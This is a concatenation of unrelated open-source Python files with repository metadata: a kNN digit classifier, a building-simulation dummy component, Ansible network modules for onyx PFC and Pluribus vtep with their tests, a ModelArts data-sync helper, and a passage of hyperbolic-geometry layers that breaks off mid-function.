            3-integer date (e.g. 01/05/09) as the year. If ``True``, the first
            number is taken to be the year, otherwise the last number is taken
            to be the year.
        fuzzy (bool): Whether to allow fuzzy parsing, allowing for string like
            "Today is January 1, 2047 at 8:21:00AM".
        add_utc_timezone (bool): Whether to add UTC timezone to the date string
            returned in case offset-naive date was provided as input.
        expected_output (str): The iso 8601 formatted date to check the result against
    """
    # Silence demisto error logging during the parse call.
    mocker.patch.object(demisto, 'error')
    assert parse_datestring_to_iso(date_value, day_first, year_first, fuzzy, add_utc_timezone) == expected_output
71.120482
118
0.655429
5dca870e069c6a0a5d577bc3920a45fd2a1a7e19
5,289
py
Python
KNN/kNN.py
lance52587/MachineLearningNote
0184f8de178990ee31ace2a43809830874313697
[ "MIT" ]
37
2018-06-06T05:58:54.000Z
2022-02-21T04:49:54.000Z
KNN/kNN.py
YYangjlu/MachineLearningNote
d34a9b57af3b2c6f276d14c2a7a3dccadb585421
[ "MIT" ]
null
null
null
KNN/kNN.py
YYangjlu/MachineLearningNote
d34a9b57af3b2c6f276d14c2a7a3dccadb585421
[ "MIT" ]
35
2018-10-01T16:12:34.000Z
2022-02-21T03:35:33.000Z
# -*- coding: utf-8 -*-
# @Date   : 2017-04-03 15:47:04
# @Author : Alan Lau ([email protected])
#
# k-nearest-neighbour classifier for handwritten-digit text vectors.
# (The fully commented-out duplicate of this module that used to precede
# it has been deleted.)

import os
import math
import collections

import numpy as np


def Euclidean(vec1, vec2):
    """Euclidean distance between two equal-length numeric vectors."""
    npvec1, npvec2 = np.array(vec1), np.array(vec2)
    return math.sqrt(((npvec1 - npvec2) ** 2).sum())


def fwalker(path):
    """Recursively collect all file paths below `path`.

    Portability fix: the original joined paths with a hard-coded '\\'
    separator, which only works on Windows; os.path.join works everywhere.
    """
    fileArray = []
    for root, dirs, files in os.walk(path):
        for fn in files:
            fileArray.append(os.path.join(root, fn))
    return fileArray


def orderdic(dic, reverse):
    """Return dict items as a list of (key, value) pairs sorted by value."""
    return sorted(dic.items(), key=lambda item: item[1], reverse=reverse)


def get_data(data_path):
    """Load [label, flat_vector] pairs from every file under `data_path`.

    The first character of each file name encodes the digit label.
    A list of 2-element lists is used instead of a dict because labels repeat.
    """
    label_vec = []
    for file in fwalker(data_path):
        # Portability fix: basename instead of splitting on a literal '\\'.
        ech_label = int(os.path.basename(file)[0])
        ech_vec = (np.loadtxt(file)).ravel()
        label_vec.append([ech_label, ech_vec])
    return label_vec


def find_label(train_vec_list, vec, k):
    """Predict a label for `vec` by majority vote of its k nearest neighbours."""
    get_label_list = []
    for train_label, train_vec in train_vec_list:
        get_label_list.append([train_label, Euclidean(train_vec, vec)])
    result_k = np.array(get_label_list)
    order_distance = (result_k.T)[1].argsort()   # ascending by distance
    order = np.array((result_k[order_distance].T)[0])
    top_k = np.array(order[:k], dtype=int)       # labels of the k nearest
    # Most frequent label among the top k
    return orderdic(collections.Counter(top_k), True)[0][0]


def classify(train_vec_list, test_vec_list, k):
    """Classify every test vector, printing each prediction and the accuracy."""
    error_counter = 0
    for label, vec in test_vec_list:
        get_label = find_label(train_vec_list, vec, k)
        print('Original label is:' + str(label) + ', kNN label is:' + str(get_label))
        if str(label) != str(get_label):
            error_counter += 1
    true_probability = str(round((1 - error_counter / len(test_vec_list)) * 100, 2)) + '%'
    print('Correct probability:' + true_probability)


def main():
    k = 3
    train_data_path = r'..\KNN\lab3_0930\input_digits\trainingDigits'
    test_data_path = r'..\KNN\lab3_0930\input_digits\testDigits'
    train_vec_list = get_data(train_data_path)
    test_vec_list = get_data(test_data_path)
    classify(train_vec_list, test_vec_list, k)


if __name__ == '__main__':
    main()
34.568627
123
0.650974
5d30b9642ca02eb7664d764f1fd524886afbe78d
6,643
py
Python
hisim/components/dummy.py
sdickler/HiSim
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
[ "MIT" ]
null
null
null
hisim/components/dummy.py
sdickler/HiSim
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
[ "MIT" ]
null
null
null
hisim/components/dummy.py
sdickler/HiSim
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
[ "MIT" ]
1
2022-03-13T16:15:36.000Z
2022-03-13T16:15:36.000Z
# Generic/Built-in
import copy
import numpy as np
from typing import List, Optional

# Owned
from hisim.component import Component, SingleTimeStepValues, ComponentInput, ComponentOutput
from hisim.components.ev_charger import SimpleStorageState
from hisim.utils import HISIMPATH
from hisim import loadtypes as lt
from hisim.utils import load_smart_appliance
from hisim import utils
import pdb  # NOTE(review): pdb appears unused here — consider removing
from hisim.simulationparameters import SimulationParameters

__authors__ = "Vitor Hugo Bellotto Zago"
__copyright__ = "Copyright 2021, the House Infrastructure Project"
__credits__ = ["Noah Pflugradt"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Vitor Hugo Bellotto Zago"
__email__ = "[email protected]"
__status__ = "development"


class Dummy(Component):
    """Component that supplies constant dummy values for fictitious scenarios.

    The values passed to the constructor are taken as constants to build the
    load profile for the entire simulation duration. Internally the component
    models a simple thermal store: stored energy is `(temperature + 273.15K)
    * capacity`, updated each timestep from the ThermalEnergyDelivered input.

    Parameters
    ----------
    electricity : float
        Constant used to scale the electricity output profile (kW-scale;
        multiplied by -1E3 internally).
    heat : float
        Constant to define the heat output profile.
        NOTE(review): `heat` is accepted but never used in build() — confirm
        whether it is intentionally ignored.
    capacity : float
        Stored-energy capacity used when starting the simulation.
    initial_temperature : float
        Initial temperature when starting the simulation.
    my_simulation_parameters : SimulationParameters
        Simulation parameters used by the setup function.
    """
    # Input channel name
    ThermalEnergyDelivered = "ThermalEnergyDelivered"

    # Outputs
    ElectricityOutput = "ElectricityOutput"
    TemperatureMean = "Residence Temperature"
    StoredEnergy = "StoredEnergy"

    def __init__(self,
                 my_simulation_parameters: SimulationParameters,
                 electricity=None,
                 heat=None,
                 capacity=None,
                 initial_temperature=None,
                 ):
        super().__init__(name="Dummy", my_simulation_parameters=my_simulation_parameters)
        # Declared up front for type clarity; assigned in build().
        self.capacity: float
        self.initial_temperature: float
        self.build(electricity=electricity,
                   heat=heat,
                   capacity=capacity,
                   initial_temperature=initial_temperature)

        # Thermal energy received from the connected component each timestep.
        self.thermal_energy_deliveredC: ComponentInput = self.add_input(
            self.ComponentName,
            self.ThermalEnergyDelivered,
            lt.LoadTypes.Heating,
            lt.Units.Watt,
            False)

        # Mean residence temperature output [°C].
        self.t_mC: ComponentOutput = self.add_output(
            self.ComponentName,
            self.TemperatureMean,
            lt.LoadTypes.Temperature,
            lt.Units.Celsius)
        # Electricity output profile [W].
        self.electricity_outputC: ComponentOutput = self.add_output(
            self.ComponentName,
            self.ElectricityOutput,
            lt.LoadTypes.Electricity,
            lt.Units.Watt)
        # Currently stored thermal energy.
        self.stored_energyC: ComponentOutput = self.add_output(
            self.ComponentName,
            self.StoredEnergy,
            lt.LoadTypes.Heating,
            lt.Units.Watt)

        # Sentinel below absolute zero; overwritten by build() before use.
        self.temperature: float = -300

    def build(self, electricity: Optional[float], heat: float,
              capacity: Optional[float], initial_temperature: Optional[float]):
        """Initialize internal constants, applying defaults for None arguments.

        Defaults: electricity -> -1E3 W, capacity -> 45 * 121.2,
        initial_temperature -> 25 °C. `heat` is currently not used.
        """
        self.time_correction_factor: float = 1 / self.my_simulation_parameters.seconds_per_timestep
        self.seconds_per_timestep: float = self.my_simulation_parameters.seconds_per_timestep

        # Electricity constant is negated and scaled from kW to W.
        if electricity is None:
            self.electricity_output: float = - 1E3
        else:
            self.electricity_output = - 1E3 * electricity

        if capacity is None:
            self.capacity = 45 * 121.2
        else:
            self.capacity = capacity

        if initial_temperature is None:
            self.temperature = 25
            self.initial_temperature = 25
        else:
            self.temperature = initial_temperature
            self.initial_temperature = initial_temperature
        # Seed the saved state so i_restore_state() works before any save.
        self.previous_temperature = self.temperature

    def write_to_report(self):
        """Return report lines for this component (currently none)."""
        lines: List = []
        return lines

    def i_save_state(self):
        # Snapshot the temperature for iterative solver restarts.
        self.previous_temperature = self.temperature

    def i_restore_state(self):
        # Roll back to the last snapshot taken by i_save_state().
        self.temperature = self.previous_temperature

    def i_doublecheck(self, timestep: int, stsv: SingleTimeStepValues):
        pass

    def i_simulate(self, timestep: int, stsv: SingleTimeStepValues, force_convergence: bool):
        """Emit one timestep of the dummy profile.

        Electricity: the configured constant during minutes 360-539 and its
        negation during minutes 900-1079 (assuming 1-minute timesteps —
        TODO confirm), zero otherwise. Thermal: for the first 12 hours the
        store is held at the initial temperature; afterwards delivered thermal
        energy is integrated into the stored energy and the temperature is
        derived from it.
        """
        electricity_output: float = 0
        if timestep >= 60 * 6 and timestep < 60 * 9:
            electricity_output = self.electricity_output
        elif timestep >= 60 * 15 and timestep < 60 * 18:
            electricity_output = - self.electricity_output

        stsv.set_output_value(self.electricity_outputC, electricity_output)

        if timestep <= 60 * 12:
            # Warm-up phase: hold the initial state.
            thermal_delivered_energy = 0
            temperature: float = self.initial_temperature
            current_stored_energy = (self.initial_temperature + 273.15) * self.capacity
        else:
            # Integrate delivered energy into the store and derive temperature
            # from stored energy (Kelvin offset 273.15).
            thermal_delivered_energy = stsv.get_input_value(self.thermal_energy_deliveredC)
            previous_stored_energy = (self.previous_temperature + 273.15) * self.capacity
            current_stored_energy = previous_stored_energy + thermal_delivered_energy
            self.temperature = current_stored_energy / self.capacity - 273.15
            temperature = self.temperature

        stsv.set_output_value(self.stored_energyC, current_stored_energy)
        stsv.set_output_value(self.t_mC, temperature)
41.006173
124
0.617191
dbaaf23f145d5a04f8b02a26023396b77b3dc4df
4,447
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.onyx import onyx_pfc_interface
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
from ..onyx_module import TestOnyxModule, load_fixture


class TestOnyxPfcInterfaceModule(TestOnyxModule):
    """Unit tests for the onyx_pfc_interface module.

    Device interaction is fully mocked: the PFC config is served from fixture
    files selected by self._pfc_enabled, load_config is stubbed out, and the
    OS version is pinned to 3.6.5000.
    """

    module = onyx_pfc_interface

    def setUp(self):
        """Install mocks for config retrieval, config load and OS version."""
        super(TestOnyxPfcInterfaceModule, self).setUp()
        # Controls which fixture load_fixtures() serves (enabled/disabled).
        self._pfc_enabled = True
        self.mock_get_config = patch.object(
            onyx_pfc_interface.OnyxPfcInterfaceModule, "_get_pfc_config")
        self.get_config = self.mock_get_config.start()

        self.mock_load_config = patch(
            'ansible_collections.community.general.plugins.module_utils.network.onyx.onyx.load_config')
        self.load_config = self.mock_load_config.start()
        self.mock_get_version = patch.object(
            onyx_pfc_interface.OnyxPfcInterfaceModule, "_get_os_version")
        self.get_version = self.mock_get_version.start()

    def tearDown(self):
        """Stop every mock started in setUp()."""
        super(TestOnyxPfcInterfaceModule, self).tearDown()
        self.mock_get_config.stop()
        self.mock_load_config.stop()
        self.mock_get_version.stop()

    def load_fixtures(self, commands=None, transport='cli'):
        """Wire the mocks: serve the enabled/disabled PFC fixture file."""
        if self._pfc_enabled:
            suffix = 'enabled'
        else:
            suffix = 'disabled'
        config_file = 'onyx_pfc_interface_%s.cfg' % suffix
        self.get_config.return_value = load_fixture(config_file)
        self.load_config.return_value = None
        self.get_version.return_value = "3.6.5000"

    def _test_pfc_if(self, if_name, enabled, changed, commands):
        # Run the module for one interface and assert changed/commands.
        state = 'enabled' if enabled else 'disabled'
        set_module_args(dict(name=if_name, state=state))
        self.execute_module(changed=changed, commands=commands)

    def _test_pfc_no_change(self, enabled):
        # Requesting the state the device already has must be a no-op
        # for every interface type (ethernet, split port, po, mpo).
        interfaces = ('Eth1/1', 'Eth1/1/2', 'Po1', 'Mpo2')
        changed = False
        commands = None
        for ifc in interfaces:
            self._test_pfc_if(ifc, enabled, changed, commands)

    def test_pfc_enabled_no_change(self):
        """enabled -> enabled is idempotent."""
        self._pfc_enabled = True
        enabled = True
        self._test_pfc_no_change(enabled)

    def test_pfc_disabled_no_change(self):
        """disabled -> disabled is idempotent."""
        self._pfc_enabled = False
        enabled = False
        self._test_pfc_no_change(enabled)

    def _test_pfc_change(self, enabled):
        # Flipping the state must emit exactly one command per interface.
        cmd_list = [
            ('Eth1/1', 'interface ethernet 1/1'),
            ('Eth1/1/2', 'interface ethernet 1/1/2'),
            ('Po1', 'interface port-channel 1'),
            ('Mpo2', 'interface mlag-port-channel 2'),
        ]
        changed = True
        suffix = ' dcb priority-flow-control mode on force'
        if not enabled:
            suffix = ' no dcb priority-flow-control mode force'
        for (if_name, cmd) in cmd_list:
            commands = [cmd + suffix]
            self._test_pfc_if(if_name, enabled, changed, commands)

    def test_pfc_disabled_change(self):
        """disabled -> enabled emits the enable command."""
        self._pfc_enabled = False
        enabled = True
        self._test_pfc_change(enabled)

    def test_pfc_enabled_change(self):
        """enabled -> disabled emits the disable command."""
        self._pfc_enabled = True
        enabled = False
        self._test_pfc_change(enabled)

    def test_pfc_aggregate(self):
        """Aggregate form enables PFC on every listed interface."""
        self._pfc_enabled = False
        aggregate = [dict(name='Eth1/1'), dict(name='Eth1/1/2')]
        set_module_args(dict(aggregate=aggregate, state='enabled'))
        commands = [
            'interface ethernet 1/1 dcb priority-flow-control mode on force',
            'interface ethernet 1/1/2 dcb priority-flow-control mode on force']
        self.execute_module(changed=True, commands=commands)

    def test_pfc_aggregate_purge(self):
        """With purge=True, interfaces absent from the aggregate are disabled."""
        self._pfc_enabled = True
        aggregate = [dict(name='Po1'), dict(name='Mpo2')]
        set_module_args(dict(aggregate=aggregate, state='enabled', purge=True))
        commands = [
            'interface ethernet 1/1 no dcb priority-flow-control mode force',
            'interface ethernet 1/1/2 no dcb priority-flow-control mode force']
        self.execute_module(changed=True, commands=commands)
38.669565
103
0.670564
dbc9b69c59fff01ef0e276b0ea84fad1e309986e
818
py
Python
sketches/natureOfCode/chapter01/mover/mover.py
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
4
2018-06-03T02:11:46.000Z
2021-08-18T19:55:15.000Z
sketches/natureOfCode/chapter01/mover/mover.py
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
null
null
null
sketches/natureOfCode/chapter01/mover/mover.py
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
3
2019-12-23T19:12:51.000Z
2021-04-30T14:00:31.000Z
class Mover(object):
    """A particle with random position and velocity that wraps at the edges.

    Relies on the Processing runtime globals: PVector, random, width, height,
    stroke, fill, ellipse.
    """

    def __init__(self):
        # Start anywhere on the canvas with a random velocity in [-5, 5).
        self.location = PVector(random(width), random(height))
        self.velocity = PVector(random(-5, 5), random(-5, 5))
        self.r = 15

    def update(self):
        """Advance the mover by one velocity step."""
        self.location.add(self.velocity)

    def display(self):
        """Draw the mover as a filled circle with a black outline."""
        stroke(0)
        fill(255, 100, 255)
        diameter = 2 * self.r
        ellipse(self.location.x, self.location.y, diameter, diameter)

    def checkBoundaries(self):
        """Wrap the mover to the opposite edge once it fully leaves the canvas."""
        loc = self.location
        r = self.r
        if loc.x > width + r:
            loc.x = -r
        elif loc.x < -r:
            loc.x = width + r
        if loc.y > height + r:
            loc.y = -r
        elif loc.y < -r:
            loc.y = height + r
28.206897
69
0.530562
919f35df2425fa45d68a62ff250d7f7259d01c3d
5,345
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#!/usr/bin/python
# Copyright: (c) 2018, Pluribus Networks
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type

ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}

DOCUMENTATION = '''
---
module: pn_vtep
author: "Pluribus Networks (@rajaspachipulusu17)"
short_description: CLI command to create/delete vtep
description:
  - This module can be used to create a vtep and delete a vtep.
options:
  pn_cliswitch:
    description:
      - Target switch to run the CLI on.
    required: false
    type: str
  state:
    description:
      - vtep configuration command.
    required: false
    choices: ['present', 'absent']
    type: str
    default: 'present'
  pn_name:
    description:
      - vtep name.
    required: false
    type: str
  pn_ip:
    description:
      - Primary IP address.
    required: false
    type: str
  pn_vrouter_name:
    description:
      - name of the vrouter service.
    required: false
    type: str
  pn_virtual_ip:
    description:
      - Virtual/Secondary IP address.
    required: false
    type: str
  pn_location:
    description:
      - switch name.
    required: false
    type: str
  pn_switch_in_cluster:
    description:
      - Tells whether switch in cluster or not.
    required: false
    type: bool
    default: True
'''

EXAMPLES = """
- name: create vtep
  pn_vtep:
    pn_cliswitch: 'sw01'
    pn_name: 'foo'
    pn_vrouter_name: 'foo-vrouter'
    pn_ip: '22.22.22.2'
    pn_location: 'sw01'
    pn_virtual_ip: "22.22.22.1"

- name: delete vtep
  pn_vtep:
    pn_cliswitch: 'sw01'
    state: 'absent'
    pn_name: 'foo'
"""

RETURN = """
command:
  description: the CLI command run on the target node.
  returned: always
  type: str
stdout:
  description: set of responses from the vtep command.
  returned: always
  type: list
stderr:
  description: set of error responses from the vtep command.
  returned: on error
  type: list
changed:
  description: indicates whether the CLI caused changes on the target.
  returned: always
  type: bool
"""

from ansible.module_utils.basic import AnsibleModule
from ansible_collections.community.general.plugins.module_utils.network.netvisor.pn_nvos import pn_cli, run_cli
from ansible_collections.community.general.plugins.module_utils.network.netvisor.netvisor import run_commands


def check_cli(module, cli):
    """Check for idempotency using the vtep-show command.

    :param module: The Ansible module to fetch input parameters.
    :param cli: The CLI string.
    :return: True if a vtep named module.params['pn_name'] already exists,
        False otherwise.
    """
    name = module.params['pn_name']

    cli += ' vtep-show format name no-show-headers'
    out = run_commands(module, cli)[1]

    if out:
        out = out.split()

    # Guard against run_commands returning None/empty output, which would
    # previously raise TypeError on `name in out`.
    return bool(out) and name in out


def main():
    """Parse arguments and run vtep-create/vtep-delete idempotently."""

    state_map = dict(
        present='vtep-create',
        absent='vtep-delete'
    )

    argument_spec = dict(
        pn_cliswitch=dict(required=False, type='str'),
        # Pass a real list of choices, not a dict view.
        state=dict(required=False, type='str',
                   choices=list(state_map.keys()), default='present'),
        pn_name=dict(required=False, type='str'),
        pn_ip=dict(required=False, type='str'),
        pn_vrouter_name=dict(required=False, type='str'),
        pn_virtual_ip=dict(required=False, type='str'),
        pn_location=dict(required=False, type='str'),
        # bool default must be a bool, not the string 'True'.
        pn_switch_in_cluster=dict(required=False, type='bool', default=True)
    )

    module = AnsibleModule(
        argument_spec=argument_spec,
        required_if=(
            ["state", "present",
             ["pn_name", "pn_ip", "pn_vrouter_name", "pn_location"]],
            ["state", "absent", ["pn_name"]],
        ),
    )

    # Accessing the arguments
    cliswitch = module.params['pn_cliswitch']
    state = module.params['state']
    name = module.params['pn_name']
    ip = module.params['pn_ip']
    vrouter_name = module.params['pn_vrouter_name']
    virtual_ip = module.params['pn_virtual_ip']
    location = module.params['pn_location']
    switch_in_cluster = module.params['pn_switch_in_cluster']

    if switch_in_cluster and not virtual_ip and state == 'present':
        # fail_json (not exit_json with failed=True) so the module exits
        # non-zero on this validation error.
        module.fail_json(
            msg='virtual ip is required when switch is in cluster'
        )

    command = state_map[state]

    # Building the CLI command string
    cli = pn_cli(module, cliswitch)

    NAME_EXISTS = check_cli(module, cli)

    cli += ' %s name %s ' % (command, name)

    if command == 'vtep-delete':
        # Nothing to delete: skip instead of sending a failing CLI command.
        if NAME_EXISTS is False:
            module.exit_json(
                skipped=True,
                msg='vtep with name %s does not exist' % name
            )

    if command == 'vtep-create':
        # Already present: skip (idempotency).
        if NAME_EXISTS is True:
            module.exit_json(
                skipped=True,
                msg='vtep with name %s already exists' % name  # typo 'vtpe' fixed
            )
        cli += 'vrouter-name %s ' % vrouter_name
        cli += 'ip %s ' % ip
        cli += 'location %s ' % location

        if virtual_ip:
            cli += 'virtual-ip %s ' % virtual_ip

    run_cli(module, cli, state_map)


if __name__ == '__main__':
    main()
26.20098
111
0.640037
37d2717e8b3e1fa56c025383d7488218b1e125ca
2,176
py
Python
research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Moxing adapter for ModelArts"""

import os

# Monotonic counter so each sync_data() call uses a distinct lock file.
_global_sync_count = 0


def get_device_id():
    """Return this process's device id from DEVICE_ID (default 0)."""
    device_id = os.getenv('DEVICE_ID', '0')
    return int(device_id)


def get_device_num():
    """Return the total number of devices from RANK_SIZE (default 1)."""
    device_num = os.getenv('RANK_SIZE', '1')
    return int(device_num)


def get_rank_id():
    """Return this process's global rank from RANK_ID (default 0)."""
    global_rank_id = os.getenv('RANK_ID', '0')
    return int(global_rank_id)


def get_job_id():
    """Return the JOB_ID environment variable, or "default" if unset/empty.

    Bug fix: os.getenv('JOB_ID') returns None when the variable is unset,
    and the original `job_id != ""` test let that None through; a truthiness
    check maps both None and "" to "default".
    """
    job_id = os.getenv('JOB_ID')
    return job_id if job_id else "default"


def sync_data(from_path, to_path, threads=16):
    """
    Download data from remote obs to local directory if the first url is remote url and the second one is local path
    Upload data from local directory to remote obs in contrast.

    One device per server (device_id % min(device_num, 8) == 0) performs the
    copy and then creates a lock file; all other devices poll for the lock
    file before returning, so every process sees the synced data.
    """
    import moxing as mox
    import time
    global _global_sync_count
    sync_lock = "/tmp/copy_sync.lock" + str(_global_sync_count)
    _global_sync_count += 1

    # Each server contains 8 devices as most.
    if get_device_id() % min(get_device_num(), 8) == 0 and not os.path.exists(sync_lock):
        print("from path: ", from_path)
        print("to path: ", to_path)
        mox.file.copy_parallel(from_path, to_path, threads=threads)
        print("===finish data synchronization===")
        try:
            os.mknod(sync_lock)
        except IOError:
            # Best effort: another process may have created the lock first.
            pass
        print("===save flag===")

    # Wait until the copying device has published the lock file.
    while True:
        if os.path.exists(sync_lock):
            break
        time.sleep(1)

    print("Finish sync data from {} to {}.".format(from_path, to_path))
29.808219
116
0.653033
f4352e3f34ff59bdfc8dd2bfbaf3ca6bfe02756d
8,596
py
Python
research/nlp/hypertext/src/poincare.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/nlp/hypertext/src/poincare.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/nlp/hypertext/src/poincare.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Poincare-ball / Klein-model hyperbolic operations as MindSpore Cells.

Each Cell implements one numeric primitive; `min_norm` is a small epsilon
used throughout to avoid division by zero near the ball boundary.
"""
import mindspore.numpy as mnp
from mindspore.nn import Cell, Norm
from mindspore.ops import Shape, ReduceSum, Sqrt, ExpandDims, Tanh, Transpose, matmul, Pow, Reshape, clip_by_value
import mindspore.common.dtype as mstype
from src.math_utils import Artanh


class LorentzFactors(Cell):
    """Compute per-vector Lorentz (gamma) factors 1 / (1 - ||x||^2 + eps)."""

    def __init__(self, min_norm):
        """Store the epsilon and build the last-axis norm op."""
        super(LorentzFactors, self).__init__()
        self.min_norm = min_norm
        self.norm = Norm(axis=-1)

    def construct(self, x):
        """Return the Lorentz factor of each vector along the last axis."""
        x_norm = self.norm(x)
        return 1.0 / (1.0 - x_norm ** 2 + self.min_norm)


class ClampMin(Cell):
    """Mask-based elementwise lower clamp: max(tensor, min1).

    NOTE(review): at exact equality tensor == min1 both masks are 1, so the
    result is 2 * min1 instead of min1 — harmless for the tiny epsilons used
    here, but worth confirming.
    """

    def __init__(self):
        """Build the shape op used to create the additive mask."""
        super(ClampMin, self).__init__()
        self.shape = Shape()

    def construct(self, tensor, min1):
        """Replace entries below min1 with min1 via complementary masks."""
        min_mask = (tensor <= min1)
        min_mask1 = (tensor >= min1)
        min_add = mnp.ones(self.shape(tensor)) * min1 * min_mask
        return tensor * min_mask1 + min_add


class Proj(Cell):
    """Project points back inside the Poincare ball of curvature c."""

    def __init__(self, min_norm):
        """Store epsilon and the maximum allowed (scaled) norm."""
        super(Proj, self).__init__()
        self.clamp_min = ClampMin()
        self.min_norm = min_norm
        self.norm_k = Norm(axis=-1, keep_dims=True)
        # Keep points strictly inside the boundary for numerical stability.
        self.maxnorm = 1 - 4e-3

    def construct(self, x, c):
        """Rescale any vector whose norm exceeds maxnorm / sqrt(c)."""
        norm = self.clamp_min(self.norm_k(x), self.min_norm)
        maxnorm = self.maxnorm / (c ** 0.5)
        cond = norm > maxnorm
        projected = x / norm * maxnorm
        return mnp.where(cond, projected, x)


class Clamp(Cell):
    """Elementwise clamp to [min1, max1] via clip_by_value."""

    def __init__(self):
        super(Clamp, self).__init__()
        # NOTE(review): self.shape is unused in this class.
        self.shape = Shape()

    def construct(self, tensor, min1, max1):
        """Clip tensor values into [min1, max1]."""
        return clip_by_value(tensor, min1, max1)


class Logmap0(Cell):
    """Logarithmic map at the origin of the Poincare ball."""

    def __init__(self, min_norm):
        """Build norm/artanh/clamp helpers."""
        super(Logmap0, self).__init__()
        self.min_norm = min_norm
        self.norm_k = Norm(axis=-1, keep_dims=True)
        self.artanh = Artanh()
        # NOTE(review): duplicate assignment of self.norm_k kept as-is.
        self.norm_k = Norm(axis=-1, keep_dims=True)
        self.clamp_min = ClampMin()

    def construct(self, p, c):
        """Map p from the ball (curvature c) to the tangent space at 0."""
        sqrt_c = c ** 0.5
        p_norm = self.clamp_min(self.norm_k(p), self.min_norm)
        scale = 1. / sqrt_c * self.artanh(sqrt_c * p_norm) / p_norm
        return scale * p


class KleinToPoincare(Cell):
    """Convert points from the Klein model to the Poincare ball."""

    def __init__(self, min_norm):
        """Build sqrt/sum ops and the ball projection."""
        super(KleinToPoincare, self).__init__()
        self.min_norm = min_norm
        self.sqrt = Sqrt()
        self.sum = ReduceSum(keep_dims=True)
        self.proj = Proj(self.min_norm)

    def construct(self, x, c):
        """x_P = x_K / (1 + sqrt(1 - ||x_K||^2)), then project into the ball."""
        x_poincare = x / (1.0 + self.sqrt(1.0 - self.sum(x * x, -1)))
        x_poincare = self.proj(x_poincare, c)
        return x_poincare


class ToKlein(Cell):
    """Convert Poincare-ball points to the Klein model."""

    def __init__(self, min_norm):
        """Build the sum op and the Klein-model constraint."""
        super(ToKlein, self).__init__()
        self.min_norm = min_norm
        self.sum = ReduceSum(keep_dims=True)
        self.klein_constraint = KleinConstraint(self.min_norm)

    def construct(self, x, c):
        """x_K = 2 x_P / (1 + ||x_P||^2), then re-constrain to the model."""
        x_2 = self.sum(x * x, -1)
